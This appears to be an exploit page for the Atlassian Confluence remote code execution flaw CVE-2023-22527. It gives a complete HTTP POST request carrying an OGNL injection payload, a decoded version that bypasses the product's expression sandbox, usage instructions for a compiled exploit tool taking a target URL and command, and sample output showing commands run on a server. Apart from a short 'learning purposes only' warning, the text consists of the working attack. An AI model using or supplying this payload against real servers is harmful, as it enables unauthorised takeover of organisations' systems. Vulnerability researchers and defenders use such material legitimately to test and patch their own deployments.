
Exploit for Atlassian Confluence RCE (CVE-2023-22527) that executes arbitrary commands on vulnerable servers via OGNL injection.
Atlassian Confluence - Remote Code Execution (CVE-2023-22527)
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
The bypass method mentioned in vulhub
After Confluence version 7.18.0, the official developers introduced the isSafeExpression function to restrict the execution of malicious OGNL expressions. Security researcher Alvaro Muñoz shared a bypass method that leverages #request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(String, Object) in velocity templates to obtain a sandbox-free OGNL object and execute arbitrary statements. The complete and decoded Payload is as follows:
'+(#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})),{}))+'
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗██╔════╝╚════██╗╚════██║
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝███████╗ █████╔╝ ██╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝██╔═══╝ ██╔═══╝ ╚════██║██╔═══╝ ██╔╝
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ███████╗███████╗███████║███████╗ ██║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚══════╝╚══════╝╚══════╝╚══════╝ ╚═╝
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: Atlassian Confluence - Remote Code Execution (CVE-2023-22527)
@Warn: The code is for learning purposes only, do not use it for other purposes
Usage of CVE-2023-22527.exe:
-c string
Command
-p string
Proxy Url
-t string
Target Url
CVE-2023-22527.exe -t http://127.0.0.1:8090 -c "id"
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗██╔════╝╚════██╗╚════██║
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝███████╗ █████╔╝ ██╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝██╔═══╝ ██╔═══╝ ╚════██║██╔═══╝ ██╔╝
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ███████╗███████╗███████║███████╗ ██║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚══════╝╚══════╝╚══════╝╚══════╝ ╚═╝
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: Atlassian Confluence - Remote Code Execution (CVE-2023-22527)
@Warn: The code is for learning purposes only, do not use it for other purposes
2024-01-23 16:53:16 INFO [+] RCE Result: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)